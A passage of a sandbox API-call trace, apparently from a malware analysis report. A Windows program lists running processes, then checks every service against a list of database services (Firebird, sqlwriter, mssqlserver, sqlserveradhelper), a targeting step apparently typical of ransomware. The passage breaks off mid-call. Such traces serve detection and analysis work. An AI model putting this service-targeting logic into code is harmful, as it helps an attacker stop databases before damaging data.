lstrlenW (lpString="msoia.exe") returned 9 [0047.904] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0047.905] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0047.905] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0047.906] lstrlenW (lpString="screensaver.exe") returned 15 [0047.906] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0047.907] lstrlenW (lpString="xml upper.exe") returned 13 [0047.907] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0047.908] lstrlenW (lpString="defeat preston.exe") returned 18 [0047.908] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0047.909] lstrlenW (lpString="boss isolated.exe") returned 17 [0047.909] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0047.910] lstrlenW (lpString="member.exe") returned 10 [0047.910] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0047.910] lstrlenW (lpString="chubby-er.exe") returned 13 [0047.911] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0047.911] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0047.911] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0047.912] lstrlenW (lpString="organization.exe") returned 16 [0047.912] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0047.913] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0047.913] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0047.914] lstrlenW (lpString="spray-roman.exe") returned 15 [0047.914] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0047.915] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0047.915] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0047.916] lstrlenW (lpString="tank attacks.exe") returned 16 [0047.916] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0047.917] lstrlenW (lpString="wires jacket.exe") returned 16 [0047.917] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0047.918] lstrlenW (lpString="values.exe") returned 10 [0047.918] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0047.919] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0047.919] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0047.920] lstrlenW (lpString="printersaerospace.exe") returned 21 [0047.920] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0047.922] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0047.922] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0047.923] lstrlenW (lpString="dllhost.exe") returned 11 [0047.923] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0047.924] lstrlenW (lpString="joke.exe") returned 8 [0047.924] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0047.925] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0047.925] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0047.926] lstrlenW (lpString="documents.exe") returned 13 [0047.926] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0047.927] lstrlenW (lpString="rebel.exe") returned 9 [0047.927] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0047.928] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0047.928] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.929] lstrlenW (lpString="conhost.exe") returned 11 [0047.929] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.930] lstrlenW (lpString="conhost.exe") returned 11 [0047.930] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0048.157] lstrlenW (lpString="hgaibc.exe") returned 10 [0048.157] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.157] lstrlenW (lpString="cmd.exe") returned 7 [0048.158] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x12c, pcPriClassBase=8, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0048.158] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0048.158] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.159] lstrlenW (lpString="conhost.exe") returned 11 [0048.159] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.160] lstrlenW (lpString="conhost.exe") returned 11 [0048.160] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0048.160] CloseHandle (hObject=0x2fc) returned 1 [0048.161] Sleep (dwMilliseconds=0x1f4) [0049.594] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ee08 [0049.595] EnumServicesStatusExW (in: hSCManager=0x60ee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0049.595] GetLastError () returned 0xea [0049.595] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0049.595] EnumServicesStatusExW (in: hSCManager=0x60ee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0049.596] CloseServiceHandle (hSCObject=0x60ee08) returned 1 [0049.596] lstrlenW (lpString="Appinfo") returned 7 [0049.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0049.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0049.596] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0049.596] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0049.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0049.596] lstrlenW (lpString="AppXSvc") returned 7 [0049.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0049.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0049.596] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0049.596] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0049.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0049.596] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0049.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0049.597] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0049.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0049.597] lstrlenW (lpString="Audiosrv") returned 8 [0049.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0049.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0049.597] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0049.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0049.597] lstrlenW (lpString="BFE") returned 3 [0049.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0049.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0049.597] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0049.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0049.597] lstrlenW (lpString="BITS") returned 4 [0049.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0049.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0049.597] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0049.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0049.597] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0049.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0049.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0049.597] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0049.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0049.597] lstrlenW (lpString="CDPSvc") returned 6 [0049.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0049.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0049.597] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0049.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0049.597] lstrlenW (lpString="ClickToRunSvc") returned 13 [0049.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0049.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0049.597] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0049.598] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0049.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0049.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0049.598] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0049.598] lstrlenW (lpString="CryptSvc") returned 8 [0049.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0049.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0049.598] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0049.598] lstrlenW (lpString="DcomLaunch") returned 10 [0049.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.598] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0049.598] lstrlenW (lpString="DeviceAssociationService") returned 24 [0049.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0049.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0049.598] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0049.598] lstrlenW (lpString="Dhcp") returned 4 [0049.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0049.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0049.598] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0049.598] lstrlenW (lpString="Dnscache") returned 8 [0049.598] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0049.598] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0049.598] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0049.598] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0049.598] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0049.599] lstrlenW (lpString="DoSvc") returned 5 [0049.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0049.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0049.599] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0049.599] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0049.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0049.599] lstrlenW (lpString="DPS") returned 3 [0049.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0049.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0049.599] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0049.599] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0049.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0049.599] lstrlenW (lpString="DusmSvc") returned 7 [0049.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0049.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0049.599] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0049.599] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0049.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0049.599] lstrlenW (lpString="EventLog") returned 8 [0049.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0049.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0049.599] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0049.599] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0049.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0049.599] lstrlenW (lpString="EventSystem") returned 11 [0049.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0049.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0049.599] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0049.599] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0049.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0049.599] lstrlenW (lpString="FontCache") returned 9 [0049.599] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0049.599] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0049.599] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0049.599] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0049.599] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0049.599] lstrlenW (lpString="gpsvc") returned 5 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0049.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0049.600] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0049.600] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0049.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0049.600] lstrlenW (lpString="iphlpsvc") returned 8 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.600] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0049.600] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0049.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0049.600] lstrlenW (lpString="KeyIso") returned 6 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0049.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0049.600] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0049.600] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0049.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0049.600] lstrlenW (lpString="LanmanServer") returned 12 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0049.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0049.600] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0049.600] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0049.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0049.600] lstrlenW (lpString="LanmanWorkstation") returned 17 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.600] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0049.600] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0049.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0049.600] lstrlenW (lpString="lfsvc") returned 5 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0049.600] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0049.600] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0049.600] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0049.600] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0049.600] lstrlenW (lpString="lmhosts") returned 7 [0049.600] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0049.601] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0049.601] lstrcmpiW (lpString1="mssqlserver", 